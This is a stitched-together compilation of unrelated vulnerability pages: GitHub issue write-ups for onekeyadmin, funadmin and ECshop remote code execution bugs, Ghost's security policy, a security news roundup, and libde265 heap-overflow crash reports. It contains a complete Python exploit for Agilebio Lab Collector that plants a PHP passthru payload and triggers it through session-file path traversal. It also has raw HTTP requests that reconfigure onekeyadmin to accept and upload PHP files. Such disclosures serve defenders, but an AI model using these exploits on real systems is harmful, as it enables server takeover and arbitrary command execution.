An arbitrary file upload vulnerability in the component /admin1/config/update of onekeyadmin v1.3.9 allows attackers to execute arbitrary code via a crafted PHP file.

Vulnerability affects product:onekeyadmin  
Vulnerability affects version 1.3.9  
Vulnerability type:Remote code execution  
Vulnerability Details：  
Remote code execution caused by uploading arbitrary files in the background

Vulnerability location  
Vulnerability occurs in  
app\\admin\\controller\\File#upload Although there are restrictions on ext  
  
but we found  
The app\\admin\\controller\\Config#update method can update the limit  
  
  
Vulnerability recurrence  
Conditions Admin  
poc  
The first step is to update the configuration to allow uploading php files  
\`POST /admin1/config/update HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 398  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/config/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW\_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj\_KGa\_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt\_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG\_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3\_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs\_j-o0joMSDe7mdS\_3rTvyQ5errD\_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E\_1-zYB117H7tFTA\_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae  
Connection: close

{"title":"涓婁紶闄愬埗","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png"> The second step is to upload malicious filesPOST /admin1/file/upload HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 280  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP  
Accept: _/_  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/file/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae  
Connection: close

\------WebKitFormBoundaryARP8fRC2kb4GP3oP  
Content-Disposition: form-data; name="name"

templatex  
\------WebKitFormBoundaryARP8fRC2kb4GP3oP  
Content-Disposition: form-data; name="file"; filename="1.php"  
Content-Type: text/php

\------WebKitFormBoundaryARP8fRC2kb4GP3oP--  
\`

CVE-2023-26949: Remote code execution caused by uploading arbitrary files in the background · Issue #1 · keheying/onekeyadmin

In Moodle, a remote code execution risk was identified in the Shibboleth authentication plugin.

CVE-2021-36394

Funadmin v3.2.0 was discovered to contain a remote code execution (RCE) vulnerability via the component \controller\Addon.php.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:romote code exec  
Vulnerability Details：  
Background offline installation plug-in rce  
Vulnerability location occurs in app\\backend\\controller\\Addon.php#installation plug-in does not filter malicious code  
  
Therefore, we can construct a malicious plug-in controller to cause remote code execution  
Construct the tarball  
snowflake\\controller\\Index.php executes malicious code here I call phpinfo();  
\`<?php

namespace addons\\snowflake\\controller;

use fun\\addons\\Controller;  
use think\\App;

class Index extends Controller  
{

    //首页
    public function index()
    {
    	phpinfo();
    
         echo hook_one('snowflake');
    }
    

}\`  
  
After the construction of the compressed package is completed, the background plug-in-plugin management-offline installation uploads the malicious compressed package  
http://192.168.3.129:8092/backend/ajax/uploads?save=1&path=addon  
http://192.168.3.129:8092/backend/addon/localinstall  
  

Visit after successful installation  
http://192.168.3.129:8092/addons/snowflake  
Successfully trigger our malicious code

CVE-2023-24776: Background offline installation plug-in rce · Issue #7 · funadmin/funadmin

Agilebio Lab Collector version 4.234 suffers from a remote code execution vulnerability.

    # Exploit Title: Agilebio Lab Collector Electronic Lab Notebook Remote Code Execution# Date: 2023-02-28# Exploit Author: Anthony Cole# Vendor Homepage: https://labcollector.com/labcollector-lims/add-ons/eln-electronic-lab-notebook/# Version: v4.234# Contact: http://twitter.com/acole76# Website: http://twitter.com/acole76# Tested on: PHP/MYSQL# CVE: CVE-2023-24217# Category: webapps#   # Lab Collector is a software written in PHP by Agilebio. Version v4.234 allows an authenticated user to execute os commands on the underlying operating system.#  from argparse import ArgumentParserfrom requests import Sessionfrom random import choicefrom string import ascii_lowercase, ascii_uppercase, digitsimport refrom base64 import b64encodefrom urllib.parse import quote_plussess:Session = Session()cookies = {}headers = {}state = {}def random_string(length:int) -> str:    return "".join(choice(ascii_lowercase+ascii_uppercase+digits) for i in range(length))def login(base_url:str, username:str, password:str) -> bool:    data = {"login": username, "pass": password, "Submit":"", "action":"login"}    headers["Referer"] = f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile"    res = sess.post(f"{base_url}/login.php", data=data, headers=headers)    if("My profile" in res.text):        return res.text    else:        return None    def logout(base_url:str) -> bool:    headers["Referer"] = f"{base_url}//index.php?controller=user_profile&subcontroller=update"    sess.get(f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile%26subcontroller%3Dupdate",headers=headers)def extract_field_value(contents, name):    value = re.findall(f'name="{name}" value="(.*)"', contents)    if(len(value)):        return value[0]    else:        return ""def get_profile(html:str):    return {        "contact_name": extract_field_value(html, "contact_name"),        "contact_lab": extract_field_value(html, "contact_lab"),        "contact_address": extract_field_value(html, "contact_address"),        "contact_city": extract_field_value(html, "contact_city"),        "contact_zip": extract_field_value(html, "contact_zip"),        "contact_country": extract_field_value(html, "contact_country"),        "contact_tel": extract_field_value(html, "contact_tel"),        "contact_email": extract_field_value(html, "contact_email")    }def update_profile(base_url:str, wrapper:str, param:str, data:dict) -> bool:    headers["Referer"] = f"{base_url}/index.php?controller=user_profile&subcontroller=update"    res = sess.post(f"{base_url}/index.php?controller=user_profile&subcontroller=update", data=data, headers=headers)    return Truedef execute_command(base_url:str, wrapper:str, param:str, session_path:str, cmd:str):    session_file = sess.cookies.get("PHPSESSID")    headers["Referer"] = f"{base_url}/login.php?%2F"    page = f"../../../../../..{session_path}/sess_{session_file}"    res = sess.get(f"{base_url}/extra_modules/eln/index.php?page={page}&action=edit&id=1&{param}={quote_plus(cmd)}", headers=headers)    return parse_output(res.text, wrapper)def exploit(args) -> None:    wrapper = random_string(5)    param = random_string(3)    html = login(args.url, args.login_username, args.login_password)        if(html == None):        print("unable to login")        return False        clean = get_profile(html)    data = get_profile(html)    tag = b64encode(wrapper.encode()).decode()    payload = f"<?php $t=base64_decode('{tag}');echo $t;passthru($_GET['{param}']);echo $t; ?>"            data["contact_name"] = payload #inject payload in name field    if(update_profile(args.url, wrapper, param, data)):        login(args.url, args.login_username, args.login_password) # reload the session w/ our payload        print(execute_command(args.url, wrapper, param, args.sessions, args.cmd))        update_profile(args.url, wrapper, param, clean) # revert the profile        logout(args.url)    def parse_output(contents, wrapper) -> None:    matches = re.findall(f"{wrapper}(.*)\s{wrapper}", contents, re.MULTILINE | re.DOTALL)    if(len(matches)):        return matches[0]        return Nonedef main() -> None:    parser:ArgumentParser = ArgumentParser(description="CVE-2023-24217")    parser.add_argument("--url", "-u", required=True, help="Base URL for the affected application.")    parser.add_argument("--login-username", "-lu", required=True, help="Username.")    parser.add_argument("--login-password", "-lp", required=True, help="Password.")    parser.add_argument("--cmd", "-c", required=True, help="OS command to execute.")    parser.add_argument("--sessions", "-s", required=False, default="/var/lib/php/session/", help="The location where php stores session files.")        args = parser.parse_args()    if(args.url.endswith("/")):        args.url = args.url[:-1]    if(args.sessions.endswith("/")):        args.sessions = args.sessions[:-1]    exploit(args)    passif(__name__ == "__main__"):    main()

Agilebio Lab Collector 4.234 Remote Code Execution

A vulnerability, which was classified as problematic, has been found in ECshop up to 4.1.8. Affected by this issue is some unknown functionality of the file admin/database.php of the component Backup Database Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222356.

ECSHOP 4.1.8 Code Execution Vulnerability  
Replication environment: download the source code and build the environment for source code audit  
Vulnerability recurrence:  
After the construction is completed, we can visit http://domain/admin Use ECshop account to enter the Website background  
Select a backup database under Database ->backup. After opening it, you can see its header and footer format is  

In the same format, we can construct the commands we want the database to execute, such as  

After construction, select the constructed sql file in Database ->backup ->Restore backup and submit it  
At this time, shell.php is successfully written under the target folder  
  

The is that the content of the uploaded sql file is filtered in admin/database.php when uploading the sql file, but it can still be inserted into the table of the database through hexadecimal, and then read the data in the table to bypass.  
  

After a successful upload, the command will be automatically executed.  
At the same time, when uploading the sql file, it will be automatically replaced '\\r\\n' to '  
', then we can't bypass the filter.And while the line feed in Windows is '/r/n' so if you need to manually change it to '/n' in Windows.

CVE-2023-1184: ecshop v4.1.8 RCE vulnerability · Issue #1 · wjzdalao/ecshop4.1.8

Ghost 5.35.0 allows authorization bypass: contributors can view draft posts of other users, which is arguably inconsistent with a security policy in which a contributor's draft can only be read by editors until published by an editor. NOTE: the vendor's position is that this behavior has no security impact.

Ghost is committed to developing secure, reliable products utilising all modern security best practices and processes.

The Ghost security team is made up of full time staff employed by the Ghost Foundation as well as volunteer open source contributors and security experts. We do both consultation and penetration testing of our software and infrastructure with external security researchers and agencies.

We take security very seriously at Ghost and welcome any peer review of our completely open source codebase to help ensure that it remains completely secure.

**Security features****Automatic SSL**

Ghost’s CLI tool attempts to automatically configure SSL certificates for all new Ghost installs with Let’s Encrypt by default. In 2019 we intend to make SSL mandatory for all new installs.

**Standardised permissions**

Ghost-CLI does not run as root and automatically configures all server directory permissions correctly according to OWASP Standards.

**Brute force protection**

User login attempts and password reset requests are all limited to 5 per hour per IP.

**Data validation and serialisation**

Ghost performs strong serialisation and validation on all data that goes into the database, as well as automated symlink protection on all uploaded files.

**Encoded tokens everywhere**

All user invitation and password reset tokens are base64 encoded with serverside secret. All tokens are always single use and always expire.

**Password hashing**

Ghost follows OWASP authentication standards with all passwords hashed and salted properly using bcrypt to ensure password integrity.

**SQLi prevention**

Ghost uses Bookshelf ORM + Knex query builder and does not generate _any_ of its own raw SQL queries. Ghost has no interpolation of variables directly to SQL strings.

**XSS prevention**

Ghost uses safe/escaped strings used everywhere, including and especially in all custom Handlebars helpers used in Ghost Themes

**Dependency management**

All Ghost dependencies are continually scanned using a combination of automated GitHub tooling and yarn audit to ensure their integrity.

**Reporting vulnerabilities**

Potential security vulnerabilities can be reported directly to us at security@ghost.org. The Ghost Security Team communicates privately and works in a secured, isolated repository for tracking, testing, and resolving security-related issues.

**Responsible disclosure**

The Ghost Security team is committed to working with security researchers to verify, reproduce and respond to legitimate reported vulnerabilities.

*   Provide details of the vulnerability, including information needed to reproduce and validate the vulnerability and a Proof of Concept
*   Make a good faith effort to avoid privacy violations, destruction and modification of data on live sites
*   Give reasonable time to correct the issue before making any information public

Security issues always take precedence over bug fixes and feature work. We can and do mark releases as “urgent” if they contain serious security fixes.

We will publicly acknowledge any report that results in a security commit to https://github.com/TryGhost/Ghost

**Issue triage**

We’re always interested in hearing about any reproducible vulnerability that affects the security of Ghost users, including…

*   Remote Code Execution (RCE)
*   SQL Injection (SQLi)
*   Server Side Request Forgery (SSRF)
*   Cross Site Request Forgery (CSRF)
*   Cross Site Scripting (XSS) but please read on before reporting XSS…

**However, we’re generally _not_ interested in…**

*   Privilege escalation as result of trusted users publishing arbitrary JavaScript1
*   HTTP sniffing or HTTP tampering exploits
*   Open API endpoints serving public data
*   Ghost version number disclosure
*   Brute force, DoS, DDoS, phishing, text injection, or social engineering attacks.
*   Output from automated scans
*   Clickjacking with minimal security implications
*   Missing DMARC records

**Privilege escalation attacks**

Ghost is a content management system and all users are considered to be privileged/trusted. A user can only obtain an account and start creating content after they have been invited by the site owner or similar administrator-level user.

A basic feature of Ghost as a CMS is to allow content creators to make use of scripts, SVGs, embedded content & other file uploads that are required for the content to display as intended. Because of this there will always be the possibility of “XSS” attacks, albeit only from users that have been trusted to build the site’s content.

Ghost’s admin application does a lot to ensure that unknown scripts are not run within the the admin application itself, however that only protects one side of a Ghost site. If the front-end (the rendered site that anonymous visitors see) shares the same domain as the admin application then browsers do not offer sufficient protections to prevent successful XSS attacks by trusted users.

If you are concerned that trusted users you invite to create your site will act maliciously the best advice is to split your front-end and admin area onto different domains (e.g. https://mysite.com and https://admin.mysite.com/ghost/). This way browsers offer greater built-in protection because credentials cannot be read across domains. Even in this case it should be understood that you are giving invited users completely free reign in content creation so absolute security guarantees do not exist.

Anyone concerned about the security of their Ghost install should read our hardening guide.

We take any attack vector where an untrusted user is able to inject malicious content very seriously and welcome any and all reports.

**How reports are handled**

If you report a vulnerability to us through the security@ghost.org mailing list, we will:

*   Acknowledge your email within a week
*   Investigate and let you know our findings within two weeks
*   Ensure any critical issues are resolved within a month
*   Ensure any low-priority issues are resolved within three months
*   Credit any open source commits to you
*   Let you know when we have released fixes for issues you report

**Privacy**

Ghost as an organisation is self-funded, wholly independent, and only makes revenue directly from its customers. It has zero business interests of any kind predicated on selling private user data.

In addition the Ghost software itself contains a plainly written summary of every privacy-affecting feature within Ghost, along with detailed configuration options allowing any and all of them to be disabled at will. We take user privacy seriously.

CVE-2023-26510: Ghost Security & Privacy

Plus: The US Marshals disclose a “major” cybersecurity incident, T-Mobile has gotten pwned so much, and more.

Chinese hackers proved themselves to be as prolific and invasive as ever this week with new findings revealing that in February 2022, Beijing-backed hackers compromised the email server of the Association of Southeast Asian Nations, an intergovernmental body of 10 Southeast Asian countries. The security alert, first reported by WIRED, comes as China has escalated its hacking in the region amidst rising tensions.

Meanwhile, with Russia facing economic sanctions over its invasion of Ukraine, the Kremlin has been trying to address gaps in its tech sector. Now, we've learned, it's scrambling to get a home-brewed Android phone off the ground this year. The National Computer Corporation company, a Russian IT giant, says it will somehow produce and sell 100,000 smartphones and tablets by the end of 2023. Though Android is an open-source platform, there are steps Google could take to restrict the license for the new Russian phone that could ultimately force the project to seek a different mobile operating system.

At the Network and Distributed System Security Symposium in San Diego this week, researchers from Ruhr University Bochum and the CISPA Helmholtz Center for Information Security presented findings that popular DJI quadcopters communicate using unencrypted radio signals that can be intercepted to determine where the drones are, as well as the GPS coordinates of their operators. The researchers discovered the exposed communications by reverse engineering DJI's radio protocol, DroneID.

In the US, a long-awaited national cybersecurity plan from the White House finally debuted on Thursday. In focuses in part on familiar priorities like hardening defenses for critical infrastructure and and expanding efforts to disrupt cybercriminal activity. But the plan also includes a proposal to shift legal liability for vulnerabilities and security failures onto the companies who cause them, like software makers or institutions that don't make a reasonable effort to protect sensitive data.

If you want to do something good for your cyber hygiene this weekend, we've got a roundup of the most pressing software patches to download ASAP. Seriously, go install them now, we'll wait here.

And there's more. Each week, we round up the security news we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

In December, the password-manager maker LastPass revealed that an August breach it had disclosed at the end of November was worse than the company originally thought, compromising encrypted copies of some users’ password vaults, on top of other personal information. Now, the company has disclosed a second incident that began in mid-August and allowed attackers to rampage through the company's cloud storage and exfiltrate sensitive data. Attackers gained such extraordinary access by targeting a specific LastPass employee with deep system privileges 

“This was accomplished by targeting \[a\] DevOps engineer’s home computer and exploiting a vulnerable third-party media software package, which enabled remote code execution capability and allowed the threat actor to implant keylogger malware,” LastPass wrote in an account of the situation. “The threat actor was able to capture the employee’s master password as it was entered, after the employee authenticated with MFA, and gain access to the DevOps engineer’s LastPass corporate vault.”

To target the LastPass employee, attackers exploited a Plex Media Server software vulnerability that had already been long-patched at the time. The company issued a fix for the bug in May 2020, “roughly 75 versions ago,” Plex said.

US law enforcement officials said on Monday that a stand-alone US Marshals Service network suffered a data exfiltration and ransomware attack in mid-February. “The affected system contains law enforcement sensitive information, including returns from legal process, administrative information, and personally identifiable information pertaining to subjects of USMS investigations, third parties, and certain USMS employees,” Marshals Service spokesperson Drew Wade said in a statement. The impacted data seemingly did not include information from the Witness Security Program or witness protection database. Nonetheless, Wade said that officials had “determined that it constitutes a major incident.”

Three cybercriminal groups that conduct SIM-swapping attacks have claimed that they repeatedly hacked T-Mobile last year as part of their scams. The groups would target T-Mobile employees with phishing attacks to gain access to internal company systems. Then they would sell this access to other cybercriminals to intercept individual T-Mobile customers’ SMS text messages and calls on attacker-controlled devices. The findings come from an analysis by Krebs on Security of Telegram chat activity of the three SIM-swapping gangs.

T-Mobile declined to confirm or deny the claims to Krebs on Security. “We have continued to drive enhancements that further protect against unauthorized access, including enhancing multi-factor authentication controls, hardening environments, limiting access to data, apps or services, and more,” the telecom said in a statement. “We are also focused on gathering threat intelligence data, like what you have shared, to help further strengthen these ongoing efforts.”

A bill filed last week in Texas by Representative Steve Toth would mandate that Texas internet service providers block websites that offer information about receiving abortion care. The bill would also outlaw domain registration and hosting for websites that help Texas residents obtain abortions, either through fundraising, procuring abortifacient drugs, or sharing resources. The proposal lists specific examples of websites that would have to be blocked, including aidaccess.org, heyjane.co, plancpills.org, mychoix.co, justthepill.com, and carafem.org.

The LastPass Hack Somehow Gets Worse

CleverStupidDog yf-exam v 1.8.0 is vulnerable to Deserialization which can lead to remote code execution (RCE).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-26779: fastjson 1.2.56  Deserialization Vulnerabilities · Issue #3 · CleverStupidDog/yf-exam

Libde265 1.0.9 has a heap buffer overflow vulnerability in de265_image::set_SliceAddrRS(int, int, int)

**Description**

heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265\_image::set\_SliceAddrRS(int, int, int)

**Version info**

     dec265  v1.0.9
    --------------
    usage: dec265 [options] videofile.bin
    The video file must be a raw bitstream, or a stream with NAL units (option -n).
    
    options:
      -q, --quiet       do not show decoded image
      -t, --threads N   set number of worker threads (0 - no threading)
      -c, --check-hash  perform hash check
      -n, --nal         input is a stream with 4-byte length prefixed NAL units
      -f, --frames N    set number of frames to process
      -o, --output      write YUV reconstruction
      -d, --dump        dump headers
      -0, --noaccel     do not use any accelerated code (SSE)
      -v, --verbose     increase verbosity level (up to 3 times)
      -L, --no-logging  disable logging
      -B, --write-bytestream FILENAME  write raw bytestream (from NAL input)
      -m, --measure YUV compute PSNRs relative to reference YUV
      -T, --highest-TID select highest temporal sublayer to decode
          --disable-deblocking   disable deblocking filter
          --disable-sao          disable sample-adaptive offset filter
      -h, --help        show help
    

**Reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    mkdir build
    cd build
    cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
    make -j$(nproc)
    ./dec265/dec265 653.bin
    

**ASAN**

    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    SPS error: TB > CB
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    =================================================================
    ==732766==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000007d8 at pc 0x7ff23d2ac50e bp 0x7ffce559d1f0 sp 0x7ffce559d1e0
    WRITE of size 2 at 0x6070000007d8 thread T0
        #0 0x7ff23d2ac50d in de265_image::set_SliceAddrRS(int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1ec50d)
        #1 0x7ff23d29fb85 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfb85)
        #2 0x7ff23d2a8f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
        #3 0x7ff23d2aac3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
        #4 0x7ff23d1fde6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
        #5 0x7ff23d1fe673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
        #6 0x7ff23d1fd311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
        #7 0x7ff23d200345 in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x140345)
        #8 0x7ff23d1e63f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #9 0x564bf4c049a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #10 0x7ff23cb8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #11 0x7ff23cb8ee3f in __libc_start_main_impl ../csu/libc-start.c:392
        #12 0x564bf4c027c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
    
    0x6070000007d8 is located 0 bytes to the right of 72-byte region [0x607000000790,0x6070000007d8)
    allocated by thread T0 here:
        #0 0x7ff23d50d867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
        #1 0x7ff23d2490b4 in MetaDataArray<CTB_info>::alloc(int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1890b4)
        #2 0x7ff23d245381 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x185381)
        #3 0x7ff23d2279fa in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1679fa)
        #4 0x7ff23d206b0d in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x146b0d)
        #5 0x7ff23d1fc970 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13c970)
        #6 0x7ff23d1ffbe6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #7 0x7ff23d20024c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #8 0x7ff23d1e63f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #9 0x564bf4c049a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #10 0x7ff23cb8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int)
    Shadow bytes around the buggy address:
      0x0c0e7fff80a0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
      0x0c0e7fff80b0: 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 00 00
      0x0c0e7fff80c0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c0e7fff80d0: 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
      0x0c0e7fff80e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa
    =>0x0c0e7fff80f0: fa fa 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa
      0x0c0e7fff8100: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00
      0x0c0e7fff8110: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
      0x0c0e7fff8120: 00 00 00 00 04 fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==732766==ABORTING
    

**POC**

653.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47665: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int) · Issue #369 · strukturag/libde265

Libde265 1.0.9 is vulnerable to Buffer Overflow in ff_hevc_put_hevc_qpel_pixels_8_sse

**Description**

heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff\_hevc\_put\_hevc\_qpel\_pixels\_8\_sse(short\*, long, unsigned char const\*, long, int, int, short\*)

**Version info**

     dec265  v1.0.9
    --------------
    usage: dec265 [options] videofile.bin
    The video file must be a raw bitstream, or a stream with NAL units (option -n).
    
    options:
      -q, --quiet       do not show decoded image
      -t, --threads N   set number of worker threads (0 - no threading)
      -c, --check-hash  perform hash check
      -n, --nal         input is a stream with 4-byte length prefixed NAL units
      -f, --frames N    set number of frames to process
      -o, --output      write YUV reconstruction
      -d, --dump        dump headers
      -0, --noaccel     do not use any accelerated code (SSE)
      -v, --verbose     increase verbosity level (up to 3 times)
      -L, --no-logging  disable logging
      -B, --write-bytestream FILENAME  write raw bytestream (from NAL input)
      -m, --measure YUV compute PSNRs relative to reference YUV
      -T, --highest-TID select highest temporal sublayer to decode
          --disable-deblocking   disable deblocking filter
          --disable-sao          disable sample-adaptive offset filter
      -h, --help        show help
    

**Reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    mkdir build
    cd build
    cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
    make -j$(nproc)
    ./dec265/dec265 653.bin
    

**ASAN**

    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: non-existing PPS referenced
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
